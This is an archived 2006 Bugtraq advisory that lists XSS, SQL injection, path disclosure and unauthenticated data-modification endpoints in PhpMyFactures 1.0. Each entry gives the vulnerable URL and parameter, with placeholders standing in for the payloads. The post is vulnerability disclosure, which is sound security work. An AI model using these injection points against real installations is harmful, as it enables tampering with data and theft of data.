lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 10 Jun 2006 16:46:50 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path
 Disclosure and others


PhpMyFactures 1.0
*****************

Full Path Disclosure
********************   
[Guest] http://[...]/verif.php
[Guest] http://[...]/inc/footer.php
[Guest] http://[...]/remises/ajouter_remise.php

Informations modification
*************************   
[Guest] http://[...]/tva/ajouter_tva.php?action=send&tva=[DIGITS]
[Guest] http://[...]/remises/ajouter_remise.php?action=send&titre=[TITLE]&taux=[DIGITS]
[Guest] http://[...]/pays/ajouter_pays.php?pays=[COUNTRY]&prefixe=[PHONE_PREFIX]
[Guest] http://[...]/pays/modifier_pays.php?pays=[COUNTRY]&prefixe=[PHONE_PREFIX]&id_pays=[COUNTRY_ID]
[Guest] http://[...]/produits/ajouter_cat.php?titre=[TITLE]
[Guest] http://[...]/produits/ajouter_produit.php?action=send&titre=[TITLE]&description=[DESCRIPTION]&priv_vente_ht=[PRICE]&id_taux_tva=[DIGITS]&stock=[DIGIT]
[Guest] http://[...]/produits/modifier_cat.php?action=send&id_cat=[ID]&titre=[TITLE]
[Guest] http://[...]/clients/ajouter_client.php?action=send&nom=[NAME]&prenom=[SURNAME]&societe=[ENTERPRISE]&adresse=[ADRESS]&adresse2=[ADRESS2]&ville=[CITY]&code_postal=[DIGIT]&telephone=[PHONE]&fax=[FAX]&portable=[PHONE]&email=[EMAIL]
[Guest] http://[...]/clients/modifier_client.php?action=send&id_client=[ID]&nom=[NAME]&prenom=[SURNAME]&societe=[ENTERPRISE]&adresse=[ADRESS]&adresse2=[ADRESS2]&ville=[CITY]&code_postal=[DIGIT]&telephone=[PHONE]&fax=[FAX]&portable=[PHONE]&email=[EMAIL]

Cross Site Scripting 
********************   
[Guest] http://[...]/inc/header.php?prefixe_dossier=">[XSS]
[Admin] http://[...]/remises/ajouter_remise.php?msg=">[XSS]
[Admin] http://[...]/remises/ajouter_remise.php?tire=">[XSS]
[Admin] http://[...]/tva/ajouter_tva.php?msg=">[XSS]
[Admin] http://[...]/stocks/ajouter.php?id_produit=1&msg=[XSS]&quantite=">[XSS]&taux=">[XSS]&date=">[XSS]
[Admin] http://[...]/pays/ajouter_pays.php?msg=[XSS]&pays=">[XSS]&prefixe=">[XSS]
[Admin] http://[...]/produits/ajouter_cat.php?msg=[XSS]
[Admin] http://[...]/produits/ajouter_produit.php?msg=[XSS]
[Admin] http://[...]/produits/modifier_cat.php?msg=[XSS]

SQL Injection 
*************   
[Admin] http://[...]/remises/index.php?action=delete&id_remise=1"[SQL_DELETE]
[Admin] http://[...]/tva/index.php?action=delete&id_taux=1"[SQL_SELECT]
[Admin] http://[...]/stocks/index.php?action=delete&ref_produit=1"[SQL_SELECT]&id_stock=1"[SQL_DELETE]&ref_produit=1"[SQL_SELECT]
[Admin] http://[...]/pays/index.php?action=delete&id_pays=1"[SQL_SELECT]
[Admin] http://[...]/produits/index.php?action=delete&id_cat=1[SQL_DELETE]
[Guest] http://[...]/pays/modifier_pays.php?action=send&id_pays=1"[SQL_SELECT/UPDATE]
[Guest] http://[...]/produits/ajouter_cat.php?titre=[SQL_INSERT]
[Guest] http://[...]/stocks/ajouter.php?id_produit=1"[SQL_SELECT]&quantite=[SQL_INSERT]&prix_ht=[SQL_INSERT]&date=[SQL_INSERT]
[Guest] http://[...]/produits/modifier_cat.php?id_cat="[SQL_SELECT]
[Guest] http://[...]/clients/modifier_client.php?id_client=1"[SQL_SELECT]

Credits
*******
by DarkFig - http://www.acid-root.new.fr/advisories/phpmyfactures.txt


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ